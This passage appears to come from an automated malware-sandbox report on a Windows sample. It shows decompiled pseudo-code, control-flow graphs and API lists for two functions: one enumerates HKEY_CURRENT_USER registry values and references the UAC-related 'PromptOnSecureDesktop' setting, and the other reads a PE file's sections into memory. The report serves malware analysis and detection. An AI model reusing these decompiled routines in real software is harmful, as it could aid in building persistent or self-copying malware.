                                                                                                                                  control_flow_graph 386 40704c-407071 387 407073 386->387 388 407075-40707a 386->388 387->388 389 40707c 388->389 390 40707e-407083 388->390 389->390 391 407085 390->391 392 407087-40708c 390->392 391->392 393 407090-4070ca call 402544 RegOpenKeyExA 392->393 394 40708e 392->394 397 4070d0-4070f6 call 406dc2 393->397 398 4071b8-4071c8 call 40ee2a 393->398 394->393 404 40719b-4071a9 RegEnumValueA 397->404 403 4071cb-4071cf 398->403 405 4070fb-4070fd 404->405 406 4071af-4071b2 RegCloseKey 404->406 407 40716e-407194 405->407 408 4070ff-407102 405->408 406->398 407->404 408->407 409 407104-407107 408->409 409->407 410 407109-40710d 409->410 410->407 411 40710f-407133 call 402544 call 40eed1 410->411 416 4071d0-407203 call 402544 call 40ee95 call 40ee2a 411->416 417 407139-407145 call 406cad 411->417 432 407205-407212 RegCloseKey 416->432 433 407227-40722e 416->433 423 407147-40715c call 40f1a5 417->423 424 40715e-40716b call 40ee2a 417->424 423->416 423->424 424->407 436 407222-407225 432->436 437 407214-407221 call 40ef00 432->437 434 407230-407256 call 40ef00 call 40ed23 433->434 435 40725b-40728c call 402544 call 40ee95 call 40ee2a 433->435 434->435 448 407258 434->448 451 4072b8-4072cb call 40ed77 435->451 452 40728e-40729a RegCloseKey 435->452 436->403 437->436 448->435 459 4072dd-4072f4 call 40ed23 451->459 460 4072cd-4072d8 RegCloseKey 451->460 453 4072aa-4072b3 452->453 454 40729c-4072a9 call 40ef00 452->454 453->403 454->453 463 407301 459->463 464 4072f6-4072ff 459->464 460->403 465 407304-40730f call 406cad 463->465 464->465 468 407311-40731d RegCloseKey 465->468 469 407335-40735d call 406c96 465->469 470 40732d-407330 468->470 471 40731f-40732c call 40ef00 468->471 476 4073d5-4073e2 RegCloseKey 469->476 477 40735f-407365 469->477 470->453 471->470 479 4073f2-4073f7 476->479 480 4073e4-4073f1 call 40ef00 476->480 477->476 478 407367-407370 477->478 478->476 481 407372-40737c 478->481 480->479 483 40739d-4073a2 481->483 484 40737e-407395 GetFileAttributesExA 481->484 486 4073a4 483->486 487 4073a6-4073a9 483->487 484->483 488 407397 484->488 486->487 489 4073b9-4073bc 487->489 490 4073ab-4073b8 call 40ef00 487->490 488->483 492 4073cb-4073cd 489->492 493 4073be-4073ca call 40ef00 489->493 490->489 492->476 493->492
                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                  			E0040704C(intOrPtr _a4, signed int* _a8, int _a12, int _a16, int* _a20) {
				CHAR* _v8;
				void* _v12;
				signed int _v16;
				int _v20;
				char _v24;
				char _v28;
				signed int _v32;
				char _v64;
				char _v363;
				char _v364;
				void _v400;
				intOrPtr* _t88;
				int* _t89;
				int* _t90;
				int* _t91;
				char* _t93;
				long _t94;
				signed int _t96;
				signed int _t97;
				long _t99;
				signed int _t107;
				int _t109;
				int _t119;
				int _t121;
				int _t122;
				int _t123;
				signed int _t125;
				signed int* _t130;
				int _t136;
				int _t149;
				int _t155;
				void* _t158;
				signed int _t166;
				int _t196;
				signed int _t204;
				int _t206;
				void* _t207;
				void* _t208;
				void* _t210;
				void* _t211;

				_t88 = _a8;
				_t167 = 0;
				_v16 = 0x12c;
				_v24 = 0x20;
				_v364 = 0;
				if(_t88 != 0) {
					 *_t88 = 0;
				}
				_t89 = _a12;
				if(_t89 != _t167) {
					 *_t89 = _t167;
				}
				_t90 = _a16;
				if(_t90 != _t167) {
					 *_t90 = _t167;
				}
				_t91 = _a20;
				if(_t91 != _t167) {
					 *_t91 = _t167;
				}
				_t93 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
				_t208 = _t207 + 0x14;
				_t94 = RegOpenKeyExA(0x80000001, _t93, _t167, 0x101,  &_v12); // executed
				if(_t94 != 0) {
					L21:
					_t96 = E0040EE2A(_t167, 0x4122f8, 0, 0x100) | 0xffffffff;
					goto L22;
				} else {
					_t97 = E00406DC2(_t167);
					_push( &_v16);
					_push( &_v364);
					_push( &_v28);
					_v32 = _t97;
					_push(0);
					_push( &_v24);
					_t167 =  &_v64;
					_push( &_v64);
					_v8 = 0;
					_push(0);
					while(1) {
						_t99 = RegEnumValueA(_v12, ??, ??, ??, ??, ??, ??, ??); // executed
						if(_t99 == 0x103) {
							break;
						}
						__eflags = _t99;
						if(_t99 != 0) {
							L18:
							_t25 =  &_v8;
							 *_t25 =  &(_v8[1]);
							__eflags =  *_t25;
							_push( &_v16);
							_push( &_v364);
							_push( &_v28);
							_push(0);
							_push( &_v24);
							_push( &_v64);
							_push(_v8);
							_v16 = 0x12c;
							_v24 = 0x20;
							continue;
						}
						__eflags = _v24 - _t99;
						if(_v24 <= _t99) {
							goto L18;
						}
						__eflags = _v16 - _t99;
						if(_v16 <= _t99) {
							goto L18;
						}
						__eflags = _v28 - 1;
						if(_v28 != 1) {
							goto L18;
						}
						_t107 = E0040EED1( &_v64, E00402544(0x4122f8,  &E004106A0, 9, 0xe4, 0xc8));
						_t210 = _t208 + 0x1c;
						asm("sbb eax, eax");
						_t109 =  ~_t107 + 1;
						__eflags = _t109;
						_v20 = _t109;
						if(_t109 != 0) {
							L23:
							_v8 = E0040EE95( &_v364, E00402544(0x4122f8,  &E0041069C, 4, 0xe4, 0xc8));
							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
							_t211 = _t210 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								__eflags = _v364 - 0x22;
								if(_v364 == 0x22) {
									E0040EF00( &_v364,  &_v363);
									_t149 = E0040ED23( &_v364, 0x22);
									_t211 = _t211 + 0x10;
									__eflags = _t149;
									if(_t149 != 0) {
										 *_t149 = 0;
									}
								}
								_t196 = E0040EE95( &_v364, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
								E0040EE2A(_t167, 0x4122f8, 0, 0x100);
								__eflags = _t196;
								if(_t196 != 0) {
									_t119 = E0040ED77( &_v364, _a4);
									__eflags = _t119;
									if(_t119 != 0) {
										 *_t196 = 0;
										_t121 = E0040ED23( &_v364, 0x5c);
										_v8 = _t121;
										__eflags = _t121;
										if(_t121 != 0) {
											_t63 =  &_v8;
											 *_t63 =  &(_v8[1]);
											__eflags =  *_t63;
										} else {
											_v8 =  &_v364;
										}
										_t122 = E00406CAD(_v8);
										__eflags = _t122;
										if(_t122 != 0) {
											_pop(_t204);
											_push(0x8b00007e);
											asm("lock xor esi, 0x55555555");
											_v16 = _t204;
											_t166 = _t204 >> 0x00000008 & 0x000000ff;
											_t123 = E00406C96(_t204);
											__eflags = _t123;
											if(_t123 != 0) {
												L57:
												RegCloseKey(_v12);
												__eflags = _a16;
												if(_a16 != 0) {
													E0040EF00(_a16,  &_v64);
												}
												_t125 = 0;
												__eflags = _v20;
												 *_t196 = 0x2e;
												goto L34;
											}
											__eflags = _t166 - 0x40 - 0x3f;
											if(_t166 - 0x40 > 0x3f) {
												goto L57;
											}
											__eflags = (_t204 & 0x000000ff) - 0x10;
											if((_t204 & 0x000000ff) >= 0x10) {
												goto L57;
											}
											_t206 = _a12;
											 *_t196 = 0x2e;
											__eflags = _t206;
											if(_t206 != 0) {
												_t136 = GetFileAttributesExA( &_v364, 0,  &_v400);
												__eflags = _t136;
												if(_t136 != 0) {
													 *_t206 = 1;
												}
											}
											_t130 = _a8;
											__eflags = _t130;
											if(_t130 != 0) {
												 *_t130 = _t166;
											}
											__eflags = _a16;
											if(_a16 != 0) {
												E0040EF00(_a16,  &_v64);
											}
											__eflags = _a20;
											if(_a20 != 0) {
												E0040EF00(_a20, _v8);
											}
											_t125 = 0;
											__eflags = _v20;
											goto L34;
										} else {
											RegCloseKey(_v12);
											__eflags = _a16;
											if(_a16 != 0) {
												E0040EF00(_a16,  &_v64);
											}
											 *_t196 = 0x2e;
											goto L33;
										}
									}
									RegCloseKey(_v12);
									_t96 = 0;
									goto L22;
								} else {
									RegCloseKey(_v12);
									__eflags = _a16;
									if(_a16 != 0) {
										E0040EF00(_a16,  &_v64);
									}
									L33:
									_t125 = 0;
									__eflags = _v20;
									L34:
									_t96 = (_t125 & 0xffffff00 | __eflags == 0x00000000) + 1;
									L22:
									return _t96;
								}
							}
							RegCloseKey(_v12);
							__eflags = _a16;
							if(_a16 != 0) {
								E0040EF00(_a16,  &_v64);
							}
							_t96 = 1;
							goto L22;
						}
						_t155 = E00406CAD( &_v64);
						_pop(_t167);
						__eflags = _t155;
						if(_t155 == 0) {
							L17:
							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
							_t208 = _t210 + 0xc;
							goto L18;
						}
						_t158 = E0040F1A5( &_v64);
						_t167 = _v32 ^ 0x5e5e5e5e;
						__eflags = _t158 - (_v32 ^ 0x5e5e5e5e);
						if(_t158 == (_v32 ^ 0x5e5e5e5e)) {
							goto L23;
						}
						goto L17;
					}
					RegCloseKey(_v12); // executed
					goto L21;
				}
			}











































                                                                                                                                  0x00407055
                                                                                                                                  0x00407058
                                                                                                                                  0x0040705a
                                                                                                                                  0x00407061
                                                                                                                                  0x00407068
                                                                                                                                  0x00407071
                                                                                                                                  0x00407073
                                                                                                                                  0x00407073
                                                                                                                                  0x00407075
                                                                                                                                  0x0040707a
                                                                                                                                  0x0040707c
                                                                                                                                  0x0040707c
                                                                                                                                  0x0040707e
                                                                                                                                  0x00407083
                                                                                                                                  0x00407085
                                                                                                                                  0x00407085
                                                                                                                                  0x00407087
                                                                                                                                  0x0040708c
                                                                                                                                  0x0040708e
                                                                                                                                  0x0040708e
                                                                                                                                  0x004070b4
                                                                                                                                  0x004070b9
                                                                                                                                  0x004070c2
                                                                                                                                  0x004070ca
                                                                                                                                  0x004071b8
                                                                                                                                  0x004071c8
                                                                                                                                  0x00000000
                                                                                                                                  0x004070d0
                                                                                                                                  0x004070d0
                                                                                                                                  0x004070d8
                                                                                                                                  0x004070df
                                                                                                                                  0x004070e3
                                                                                                                                  0x004070e4
                                                                                                                                  0x004070e9
                                                                                                                                  0x004070ed
                                                                                                                                  0x004070ee
                                                                                                                                  0x004070f1
                                                                                                                                  0x004070f2
                                                                                                                                  0x004070f5
                                                                                                                                  0x0040719b
                                                                                                                                  0x0040719e
                                                                                                                                  0x004071a9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004070fb
                                                                                                                                  0x004070fd
                                                                                                                                  0x0040716e
                                                                                                                                  0x0040716e
                                                                                                                                  0x0040716e
                                                                                                                                  0x0040716e
                                                                                                                                  0x00407174
                                                                                                                                  0x0040717b
                                                                                                                                  0x0040717f
                                                                                                                                  0x00407180
                                                                                                                                  0x00407185
                                                                                                                                  0x00407189
                                                                                                                                  0x0040718a
                                                                                                                                  0x0040718d
                                                                                                                                  0x00407194
                                                                                                                                  0x00000000
                                                                                                                                  0x00407194
                                                                                                                                  0x004070ff
                                                                                                                                  0x00407102
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407104
                                                                                                                                  0x00407107
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407109
                                                                                                                                  0x0040710d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407123
                                                                                                                                  0x00407128
                                                                                                                                  0x0040712d
                                                                                                                                  0x0040712f
                                                                                                                                  0x0040712f
                                                                                                                                  0x00407130
                                                                                                                                  0x00407133
                                                                                                                                  0x004071d0
                                                                                                                                  0x004071f4
                                                                                                                                  0x004071f7
                                                                                                                                  0x004071fc
                                                                                                                                  0x004071ff
                                                                                                                                  0x00407203
                                                                                                                                  0x00407227
                                                                                                                                  0x0040722e
                                                                                                                                  0x0040723e
                                                                                                                                  0x0040724c
                                                                                                                                  0x00407251
                                                                                                                                  0x00407254
                                                                                                                                  0x00407256
                                                                                                                                  0x00407258
                                                                                                                                  0x00407258
                                                                                                                                  0x00407256
                                                                                                                                  0x00407280
                                                                                                                                  0x00407282
                                                                                                                                  0x0040728a
                                                                                                                                  0x0040728c
                                                                                                                                  0x004072c2
                                                                                                                                  0x004072c9
                                                                                                                                  0x004072cb
                                                                                                                                  0x004072e6
                                                                                                                                  0x004072e8
                                                                                                                                  0x004072ef
                                                                                                                                  0x004072f2
                                                                                                                                  0x004072f4
                                                                                                                                  0x00407301
                                                                                                                                  0x00407301
                                                                                                                                  0x00407301
                                                                                                                                  0x004072f6
                                                                                                                                  0x004072fc
                                                                                                                                  0x004072fc
                                                                                                                                  0x00407307
                                                                                                                                  0x0040730d
                                                                                                                                  0x0040730f
                                                                                                                                  0x00407338
                                                                                                                                  0x00407339
                                                                                                                                  0x0040733e
                                                                                                                                  0x0040734b
                                                                                                                                  0x0040734e
                                                                                                                                  0x00407354
                                                                                                                                  0x0040735b
                                                                                                                                  0x0040735d
                                                                                                                                  0x004073d5
                                                                                                                                  0x004073d8
                                                                                                                                  0x004073de
                                                                                                                                  0x004073e2
                                                                                                                                  0x004073eb
                                                                                                                                  0x004073f1
                                                                                                                                  0x004073f2
                                                                                                                                  0x004073f4
                                                                                                                                  0x004073f7
                                                                                                                                  0x00000000
                                                                                                                                  0x004073f7
                                                                                                                                  0x00407362
                                                                                                                                  0x00407365
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040736d
                                                                                                                                  0x00407370
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407372
                                                                                                                                  0x00407375
                                                                                                                                  0x0040737a
                                                                                                                                  0x0040737c
                                                                                                                                  0x0040738d
                                                                                                                                  0x00407393
                                                                                                                                  0x00407395
                                                                                                                                  0x00407397
                                                                                                                                  0x00407397
                                                                                                                                  0x00407395
                                                                                                                                  0x0040739d
                                                                                                                                  0x004073a0
                                                                                                                                  0x004073a2
                                                                                                                                  0x004073a4
                                                                                                                                  0x004073a4
                                                                                                                                  0x004073a6
                                                                                                                                  0x004073a9
                                                                                                                                  0x004073b2
                                                                                                                                  0x004073b8
                                                                                                                                  0x004073b9
                                                                                                                                  0x004073bc
                                                                                                                                  0x004073c4
                                                                                                                                  0x004073ca
                                                                                                                                  0x004073cb
                                                                                                                                  0x004073cd
                                                                                                                                  0x00000000
                                                                                                                                  0x00407311
                                                                                                                                  0x00407314
                                                                                                                                  0x0040731a
                                                                                                                                  0x0040731d
                                                                                                                                  0x00407326
                                                                                                                                  0x0040732c
                                                                                                                                  0x0040732d
                                                                                                                                  0x00000000
                                                                                                                                  0x0040732d
                                                                                                                                  0x0040730f
                                                                                                                                  0x004072d0
                                                                                                                                  0x004072d6
                                                                                                                                  0x00000000
                                                                                                                                  0x0040728e
                                                                                                                                  0x00407291
                                                                                                                                  0x00407297
                                                                                                                                  0x0040729a
                                                                                                                                  0x004072a3
                                                                                                                                  0x004072a9
                                                                                                                                  0x004072aa
                                                                                                                                  0x004072aa
                                                                                                                                  0x004072ac
                                                                                                                                  0x004072af
                                                                                                                                  0x004072b2
                                                                                                                                  0x004071cb
                                                                                                                                  0x004071cf
                                                                                                                                  0x004071cf
                                                                                                                                  0x0040728c
                                                                                                                                  0x00407208
                                                                                                                                  0x0040720e
                                                                                                                                  0x00407212
                                                                                                                                  0x0040721b
                                                                                                                                  0x00407221
                                                                                                                                  0x00407224
                                                                                                                                  0x00000000
                                                                                                                                  0x00407224
                                                                                                                                  0x0040713d
                                                                                                                                  0x00407142
                                                                                                                                  0x00407143
                                                                                                                                  0x00407145
                                                                                                                                  0x0040715e
                                                                                                                                  0x00407166
                                                                                                                                  0x0040716b
                                                                                                                                  0x00000000
                                                                                                                                  0x0040716b
                                                                                                                                  0x0040714b
                                                                                                                                  0x00407154
                                                                                                                                  0x0040715a
                                                                                                                                  0x0040715c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040715c
                                                                                                                                  0x004071b2
                                                                                                                                  0x00000000
                                                                                                                                  0x004071b2

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000101,761B43E0,?,761B43E0,00000000), ref: 004070C2
                                                                                                                                  • RegEnumValueA.KERNELBASE(761B43E0,00000000,?,00000020,00000000,00000000,00000000,0000012C), ref: 0040719E
                                                                                                                                  • RegCloseKey.KERNELBASE(761B43E0,?,761B43E0,00000000), ref: 004071B2
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0), ref: 00407208
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0), ref: 00407291
                                                                                                                                  • ___ascii_stricmp.LIBCMT ref: 004072C2
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0), ref: 004072D0
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0), ref: 00407314
                                                                                                                                  • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040738D
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0), ref: 004073D8
                                                                                                                                    • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,PromptOnSecureDesktop,000000C8,00407150,?), ref: 0040F1AD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
                                                                                                                                  • String ID: $"$PromptOnSecureDesktop
                                                                                                                                  • API String ID: 4293430545-98143240
                                                                                                                                  • Opcode ID: d919dbd9af1343ac96c8c832437364b04d25ba813f015b914b967c8048a51357
                                                                                                                                  • Instruction ID: bdd769efad709bd93da993ba4a974553bca105625a5613f565cdc8f40f8c6bf1
                                                                                                                                  • Opcode Fuzzy Hash: d919dbd9af1343ac96c8c832437364b04d25ba813f015b914b967c8048a51357
                                                                                                                                  • Instruction Fuzzy Hash: 8FB17F71D0820ABAEB159FA1DC45BEF77B8AB04304F10047BF501F61D1EB79AA94CB69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040675C Relevance: 19.7, APIs: 13, Instructions: 199fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 576 40675c-406778 577 406784-4067a2 CreateFileA 576->577 578 40677a-40677e SetFileAttributesA 576->578 579 4067a4-4067b2 CreateFileA 577->579 580 4067b5-4067b8 577->580 578->577 579->580 581 4067c5-4067c9 580->581 582 4067ba-4067bf SetFileAttributesA 580->582 583 406977-406986 581->583 584 4067cf-4067df GetFileSize 581->584 582->581 585 4067e5-4067e7 584->585 586 40696b 584->586 585->586 588 4067ed-40680b ReadFile 585->588 587 40696e-406971 FindCloseChangeNotification 586->587 587->583 588->586 589 406811-406824 SetFilePointer 588->589 589->586 590 40682a-406842 ReadFile 589->590 590->586 591 406848-406861 SetFilePointer 590->591 591->586 592 406867-406876 591->592 593 4068d5-4068df 592->593 594 406878-40688f ReadFile 592->594 593->587 595 4068e5-4068eb 593->595 596 406891-40689e 594->596 597 4068d2 594->597 598 4068f0-4068fe call 40ebcc 595->598 599 4068ed 595->599 600 4068a0-4068b5 596->600 601 4068b7-4068ba 596->601 597->593 598->586 608 406900-40690b SetFilePointer 598->608 599->598 602 4068bd-4068c3 600->602 601->602 604 4068c5 602->604 605 4068c8-4068ce 602->605 604->605 605->594 607 4068d0 605->607 607->593 609 40695a-406969 call 40ec2e 608->609 610 40690d-406920 ReadFile 608->610 609->587 610->609 612 406922-406958 610->612 612->587
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040675C(CHAR* _a4, long* _a8, long _a12) {
				long _v8;
				void* _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				struct _OVERLAPPED* _v24;
				long _v28;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v60;
				void _v68;
				long _v72;
				void _v132;
				intOrPtr _v320;
				signed int _v360;
				signed int _v374;
				void _v380;
				void* _t85;
				long _t88;
				int _t92;
				long _t93;
				int _t96;
				long _t99;
				long _t102;
				struct _OVERLAPPED* _t103;
				long _t104;
				long _t115;
				long _t120;
				signed int _t143;
				void* _t146;

				_v16 = 0;
				_v8 = 0;
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 0x80);
				}
				_t85 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0); // executed
				_v12 = _t85;
				if(_t85 == 0xffffffff) {
					_v12 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 4, 0);
				}
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 2);
				}
				if(_v12 != 0xffffffff) {
					_t88 = GetFileSize(_v12, 0);
					_v8 = _t88;
					if(_t88 == 0xffffffff || _t88 == 0) {
						L31:
						_v8 = 0;
					} else {
						_a12 = 0;
						_v28 = 0;
						_t92 = ReadFile(_v12,  &_v132, 0x40,  &_a12, 0); // executed
						if(_t92 == 0) {
							goto L31;
						} else {
							_t93 = SetFilePointer(_v12, _v72, 0, 0); // executed
							if(_t93 == 0xffffffff) {
								goto L31;
							} else {
								_t96 = ReadFile(_v12,  &_v380, 0xf8,  &_v28, 0); // executed
								if(_t96 == 0) {
									goto L31;
								} else {
									_t99 = SetFilePointer(_v12, (_v360 & 0x0000ffff) + _v72 + 0x18, 0, 0); // executed
									if(_t99 == 0xffffffff) {
										goto L31;
									} else {
										_v20 = 0;
										_v24 = 0;
										if(0 < _v374) {
											while(1) {
												_t115 = 0x28;
												_a12 = _t115;
												if(ReadFile(_v12,  &_v68, _t115,  &_a12, 0) == 0) {
													break;
												}
												_t143 = _v374 & 0x0000ffff;
												if(_v24 != _t143 - 1) {
													_t120 = _v48 + _v52;
												} else {
													_t120 = (_v320 + _v60 - 0x00000001 &  !(_v320 - 1)) + _v48;
												}
												_a12 = _t120;
												if(_v20 < _t120) {
													_v20 = _t120;
												}
												_v24 = _v24 + 1;
												if(_v24 < _t143) {
													continue;
												} else {
												}
												goto L23;
											}
											_v8 = 0;
										}
										L23:
										if(_v24 >= (_v374 & 0x0000ffff)) {
											_t102 = _v20;
											if(_v8 > _t102) {
												_v8 = _t102;
											}
											_t103 = E0040EBCC(_v8);
											_v16 = _t103;
											if(_t103 == 0) {
												goto L31;
											} else {
												_t104 = SetFilePointer(_v12, 0, 0, 0); // executed
												if(_t104 == 0xffffffff) {
													L30:
													_v8 = 0;
													E0040EC2E(_v16);
													_v16 = 0;
												} else {
													_t146 = _v16;
													if(ReadFile(_v12, _t146, _v8,  &_v20, 0) == 0) {
														goto L30;
													} else {
														 *(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 0x10) =  *((intOrPtr*)(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 8)) + _v320 - 0x00000001 &  !(_v320 - 1);
														_v8 = _v20;
													}
												}
											}
										}
									}
								}
							}
						}
					}
					FindCloseChangeNotification(_v12); // executed
				}
				 *_a8 = _v8;
				return _v16;
			}
































                                                                                                                                  0x0040676a
                                                                                                                                  0x0040676d
                                                                                                                                  0x00406778
                                                                                                                                  0x0040677e
                                                                                                                                  0x0040677e
                                                                                                                                  0x0040679a
                                                                                                                                  0x0040679c
                                                                                                                                  0x004067a2
                                                                                                                                  0x004067b2
                                                                                                                                  0x004067b2
                                                                                                                                  0x004067b8
                                                                                                                                  0x004067bf
                                                                                                                                  0x004067bf
                                                                                                                                  0x004067c9
                                                                                                                                  0x004067d3
                                                                                                                                  0x004067d9
                                                                                                                                  0x004067df
                                                                                                                                  0x0040696b
                                                                                                                                  0x0040696b
                                                                                                                                  0x004067ed
                                                                                                                                  0x00406801
                                                                                                                                  0x00406804
                                                                                                                                  0x00406807
                                                                                                                                  0x0040680b
                                                                                                                                  0x00000000
                                                                                                                                  0x00406811
                                                                                                                                  0x0040681f
                                                                                                                                  0x00406824
                                                                                                                                  0x00000000
                                                                                                                                  0x0040682a
                                                                                                                                  0x0040683e
                                                                                                                                  0x00406842
                                                                                                                                  0x00000000
                                                                                                                                  0x00406848
                                                                                                                                  0x0040685c
                                                                                                                                  0x00406861
                                                                                                                                  0x00000000
                                                                                                                                  0x00406867
                                                                                                                                  0x00406869
                                                                                                                                  0x0040686c
                                                                                                                                  0x00406876
                                                                                                                                  0x00406878
                                                                                                                                  0x0040687a
                                                                                                                                  0x00406881
                                                                                                                                  0x0040688f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406891
                                                                                                                                  0x0040689e
                                                                                                                                  0x004068ba
                                                                                                                                  0x004068a0
                                                                                                                                  0x004068b2
                                                                                                                                  0x004068b2
                                                                                                                                  0x004068bd
                                                                                                                                  0x004068c3
                                                                                                                                  0x004068c5
                                                                                                                                  0x004068c5
                                                                                                                                  0x004068c8
                                                                                                                                  0x004068ce
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004068d0
                                                                                                                                  0x00000000
                                                                                                                                  0x004068ce
                                                                                                                                  0x004068d2
                                                                                                                                  0x004068d2
                                                                                                                                  0x004068d5
                                                                                                                                  0x004068df
                                                                                                                                  0x004068e5
                                                                                                                                  0x004068eb
                                                                                                                                  0x004068ed
                                                                                                                                  0x004068ed
                                                                                                                                  0x004068f3
                                                                                                                                  0x004068f9
                                                                                                                                  0x004068fe
                                                                                                                                  0x00000000
                                                                                                                                  0x00406900
                                                                                                                                  0x00406906
                                                                                                                                  0x0040690b
                                                                                                                                  0x0040695a
                                                                                                                                  0x0040695d
                                                                                                                                  0x00406960
                                                                                                                                  0x00406966
                                                                                                                                  0x0040690d
                                                                                                                                  0x0040690d
                                                                                                                                  0x00406920
                                                                                                                                  0x00000000
                                                                                                                                  0x00406922
                                                                                                                                  0x0040694f
                                                                                                                                  0x00406955
                                                                                                                                  0x00406955
                                                                                                                                  0x00406920
                                                                                                                                  0x0040690b
                                                                                                                                  0x004068fe
                                                                                                                                  0x004068df
                                                                                                                                  0x00406861
                                                                                                                                  0x00406842
                                                                                                                                  0x00406824
                                                                                                                                  0x0040680b
                                                                                                                                  0x00406971
                                                                                                                                  0x00406971
                                                                                                                                  0x0040697f
                                                                                                                                  0x00406986

                                                                                                                                  APIs
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000080,?,761B43E0,00000000), ref: 0040677E
                                                                                                                                  • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,761B43E0,00000000), ref: 0040679A
                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,761B43E0,00000000), ref: 004067B0
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000002,?,761B43E0,00000000), ref: 004067BF
                                                                                                                                  • GetFileSize.KERNEL32(000000FF,00000000,?,761B43E0,00000000), ref: 004067D3
                                                                                                                                  • ReadFile.KERNELBASE(000000FF,?,00000040,00408244,00000000,?,761B43E0,00000000), ref: 00406807
                                                                                                                                  • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0040681F
                                                                                                                                  • ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,761B43E0,00000000), ref: 0040683E
                                                                                                                                  • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0040685C
                                                                                                                                  • ReadFile.KERNEL32(000000FF,?,00000028,00408244,00000000,?,761B43E0,00000000), ref: 0040688B
                                                                                                                                  • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000000,?,761B43E0,00000000), ref: 00406906
                                                                                                                                  • ReadFile.KERNEL32(000000FF,004121A8,00000000,00408244,00000000,?,761B43E0,00000000), ref: 0040691C
                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(000000FF,?,761B43E0,00000000), ref: 00406971
                                                                                                                                    • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                                                                    • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Read$Pointer$AttributesCreateHeap$ChangeCloseFindFreeNotificationProcessSize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1400801100-0
                                                                                                                                  • Opcode ID: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                                                                  • Instruction ID: 23622665348289c9bdc7ba1e7bdf6275147e3319f3664adf7917ee5564634b96
                                                                                                                                  • Opcode Fuzzy Hash: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                                                                  • Instruction Fuzzy Hash: E47109B1D00219EFDB109FA5CC809EEBBB9FB04314F11457AF516B6290E7349EA2DB54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
